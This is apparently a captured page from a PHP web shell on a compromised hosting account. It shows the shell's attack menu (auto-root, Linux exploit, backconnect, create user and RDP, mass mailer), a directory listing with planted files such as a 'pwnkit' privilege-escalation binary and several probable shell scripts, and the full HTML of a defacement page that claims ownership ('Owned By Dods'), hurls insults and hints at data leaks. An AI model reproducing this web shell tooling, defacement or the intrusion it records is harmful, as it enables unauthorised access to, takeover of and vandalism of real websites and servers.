Linux webm007.cluster023.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.23.20.7 | : 216.73.216.126
Cant Read [ /etc/named.conf ]
5.4.45
antarbw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
antarbw /
[ HOME SHELL ]
Name
Size
Permission
Action
.ssh
[ DIR ]
drwx------
cgi-bin
[ DIR ]
drwx---r-x
requetes
[ DIR ]
drwx---r-x
www
[ DIR ]
dr-xr-xr-x
.forward
29
B
-rw----r--
.mad-root
0
B
-rw-r--r--
Dods.txt
53
B
-rw----r--
LISEZ-MOI
680
B
-rw----r--
MKD_REV.txt
27
B
-rw----r--
about.php
1.08
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
b02.php
750
B
-rw----r--
functions-helper.php
10.7
KB
-rw----r--
index.html
5.6
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
ratclouds.txt
3
B
-rw----r--
test_upload.txt
26
B
-rw----r--
thom-hardy.php
457
B
-rw----r--
tyasd.php
192.17
KB
-rw----r--
wolf.php
12.11
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="tr-TR"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="description" content="๐พ๐๐ฝ๐ด๐ณ ๐ฑ๐ ๐ณ๐พ๐ณ๐"> <title>๐พ๐๐ฝ๐ด๐ณ ๐ฑ๐ ๐ณ๐พ๐ณ๐</title> <link href="https://fonts.googleapis.com/css2?family=VT323&family=Orbitron:wght@700&display=swap" rel="stylesheet"> <style> * { overflow: hidden; margin: 0; padding: 0; } html { height: 100%; } body { font-family: 'VT323', monospace; background: #000; color: #00ff00; margin: 0; position: relative; } button { background: none; border: none; cursor: pointer; color: #ff00ff; font-family: 'VT323', monospace; font-size: 2.5vmin; text-shadow: 0 0 10px #ff00ff; transition: all 0.3s ease; } button:hover { text-shadow: 0 0 20px #ff00ff, 0 0 30px #ff00ff; } video#back { position: fixed; top: 50%; left: 50%; min-width: 105%; min-height: 105%; transform: translateX(-50%) translateY(-50%) rotate(5deg); filter: brightness(1.2) contrast(1.1); /* Daha parlak ve net */ z-index: -1; } #main { position: fixed; top: 0; left: 0; width: 100%; height: 100vh; display: table; text-align: center; background: rgba(0, 0, 0, 0.5); /* Arka planฤฑ biraz daha ลeffaf yaparak video รถne รงฤฑksฤฑn */ z-index: 1; } .fof { display: table-cell; vertical-align: middle; } .fof h1 { margin: 20px 0; } h2 { font-size: 2.5vmin; color: #00ccff; text-shadow: 0 0 10px #00ccff; margin: 10px 0; } h2 a { color: #46da0c; text-decoration: none; text-shadow: 0 0 5px #46da0c; } h2 a:hover { color: #ff00ff; text-shadow: 0 0 15px #ff00ff; } .hacker-rain { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 0; pointer-events: none; } .hacker-rain::before { position: absolute; top: -100%; left: 0; width: 100%; height: 200%; color: #00ff00; font-family: 'VT323', monospace; font-size: 2vmin; opacity: 0.2; animation: rain-fall 5s linear infinite; white-space: nowrap; text-shadow: 0 0 5px #00ff00; } .hacker-rain::after { content: "HACK THE PLANET 0101 1010 CYBER TURK"; position: absolute; top: -150%; left: 20%; width: 100%; height: 200%; color: #ff00ff; font-family: 'VT323', monospace; font-size: 1.8vmin; opacity: 0.15; animation: rain-fall 7s linear infinite; white-space: nowrap; text-shadow: 0 0 5px #ff00ff; } /* Animasyon */ @keyframes rain-fall { 0% { transform: translateY(0); } 100% { transform: translateY(150vh); } } </style> </head> <body onclick="unmuteee()"> <div id="anchor" onclick="unmuteee()"></div> <div class="hacker-rain"></div> <video onclick="unmuteee()" loop autoplay muted preload="none" id="back" x-webkit-airplay="allow" webkit-playsinline playsinline> <source src="https://arcministries.org/Alsana.mp4" type="video/mp4"> </video> <div id="main" onclick="unmuteee()"> <div class="fof" onclick="unmuteee()"> <h1><font size="5" style="color: red; text-shadow: 0px 1px 6px; background:url('https://i.hizliresim.com/q8029t1.gif');">๐พ๐๐ฝ๐ด๐ณ ๐ฑ๐ ๐ณ๐พ๐ณ๐ </font></h1> <h2><a href="https://t.me/DodsGudinne">Telegram : DodsGudinne</a></h2> <h2>Dengim Deฤilsiniz Oruspu Evlatlarฤฑ.</h2> <h2>I haven't leaked any data, but I could...</h2> <h2>Owned By Dods</h2> <br> <font size="5">TรRKฤฐSH DEFACER WAS HERE</font> </div> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <script> var video = $('video'); (function ($) { $(document).ready(function () { var figure = $(".fof").hover(hoverVideo); var figureq = $("body").hover(hoverVideo); var figures = $("#main").hover(hoverVideo); var figurep = $("*").hover(hoverVideo); function hoverVideo(e) { setTimeout(function () { $('video').get(0).play(); console.log('played'); }, 30000); }; }); })(jQuery); function unmuteee() { $("video").prop('muted', false); } </script> </body> </html>
Close